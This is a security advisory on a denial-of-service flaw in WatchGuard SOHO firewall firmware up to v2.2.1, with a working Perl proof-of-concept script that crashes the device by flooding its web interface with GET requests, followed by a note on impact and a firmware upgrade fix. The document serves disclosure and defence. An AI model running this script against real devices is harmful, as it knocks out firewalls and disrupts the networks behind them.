Vulnerability

    WatchGuard

Affected

    WatchGuard SOHO <= v2.2.1

Description

    Following is based on a Securax Advisory #10 concerning WatchGuard
    SOHO <=  v2.2.1 DoS.   Credit goes  to Cicer0  for original  error
    discovery -*-  vorlon for  advisory, exploit  code and  additional
    testing.

    The Watchguard SOHO Firewall is a small personal hardware firewall
    used for xDSL,  ISDN and Cable  connections.  The  Firewall uses a
    packet filtering based approach including Dynamic NAT'ting.  There
    is option for one machine in a  DMZ and has support for VPN.   The
    SOHO model is intended for small office and home office users.  To
    configure the firewall there is a html interface accessible to the
    local side (default) and even remote side (through password).

    Local  and  Remote  users  can  crash the Watchguard SOHO Firewall
    using alot (+ 70) of GET requests to the webserver on the machine.
    While sending  these request  we can  see the  free memory getting
    down very fast (from 700k to 500k after just a few requests).

    Reproduction of the problem:

    #!/usr/bin/perl
    #
    # You can also connect to the Watchguard SOHO through your
    # browser and press F5 like a maniac on speed to get the
    # firewall crashing.  So, either you run the .pl script or
    # you fire up your webbrowser... Either way, it works.
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    # (c)Proof of concept, vorlon <filip@securax.be>
    # ----------------------------------------------------------
    use IO::Socket;
    
     $host = "your_watchguard_ip";
     $port = "your_port";
     $repeat = "100";
     $request = "GET / HTTP/1.0";
    
     print "Watchguard SOHO Denial of Service, connecting to $host:$port...\n";
     $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Failed.\n";
    
      $counter = 0;
      print "Repeating request for $repeat times.\n";
       while($counter < $repeat) {
             print $socket "$request\n";
             $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "\nThe Watchguard SOHO has crashed.  BEEFCAKE!...\n";
             print ".";
             $counter += 1;
       }
      print "\nDone.\n\n";
    
      close($socket);

    After using this exploit,  the Firewall has been  rendered useless
    and will  reboot or  simply crash  and burn  (in this case, you'll
    have  to  pull  the  plug  to  reset  the  machine).  In case of a
    spontanious   reboot,   the   downtime   of   the  firewall,  thus
    functionality  of  the  company,  is  considered to be between one
    minute and  five minutes.   If one  is constantly  running exploit
    code, the  firewall can  be kept  under a  constant outage.   This
    attack will not show up in the logfile except for a reboot notice.

Solution

    Upgrade to a more recent Firmware ( > 2.2.1 ).